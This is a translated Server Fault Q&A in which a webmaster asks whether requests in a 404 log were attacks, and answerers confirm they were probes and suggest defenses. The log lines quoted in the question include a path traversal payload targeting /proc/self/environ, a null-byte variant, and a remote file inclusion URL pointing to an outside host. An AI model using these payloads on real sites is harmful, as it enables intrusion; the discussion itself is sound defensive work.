Security

這是一次黑客攻擊嗎?

  • September 2, 2010

查看我的 404 日誌,我注意到以下兩個 URL,它們都出現過一次:

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

有問題的頁面library.php需要一個type具有六個不同可接受值的變數,然後是一個id變數。所以一個有效的 URL 可能是

library.php?type=Circle-K&id=Strange-Things-Are-Afoot

並且idsmysql_real_escape_string在用於查詢數據庫之前都是經過執行的。

我是菜鳥,但在我看來,這兩個連結都是針對 webroot 的簡單攻擊?

**1)**除了404之外,如何最好地防止這些事情?

**2)**我應該永久封禁負責的 IP 嗎?

**編輯:**也剛剛注意到這個

/library.php=http://www.basfalt.no/scripts/danger.txt

**編輯 2:**所有 3 次攻擊的違規 IP 都216.97.231.15可以追溯到位於洛杉磯郊外的名為 Lunar Pages 的 ISP。

**編輯 3:**我決定在當地時間週五早上打電話給 ISP,並與我可以通過電話聯繫的任何人討論這個問題。我會在 24 小時左右在這裡發布結果。

**編輯 4:**我最終給他們的管理員發了電子郵件,他們首先回复說“他們正在調查”,然後一天后“這個問題現在應該得到解決”。遺憾的是,沒有更多細節。

  1. 是的。至少,這是對您的站點的系統性探測,試圖發現它是否易受攻擊。

1)除了確保您的程式碼是乾淨的之外,您可以做的事情不多,只能對您的主機執行自己的測試以確保它是安全的。Google Skipfish 是可以幫助您的眾多工具之一。

  1. 我願意。

這是一種攻擊,這裡有很多解釋。

引用自:https://serverfault.com/questions/175104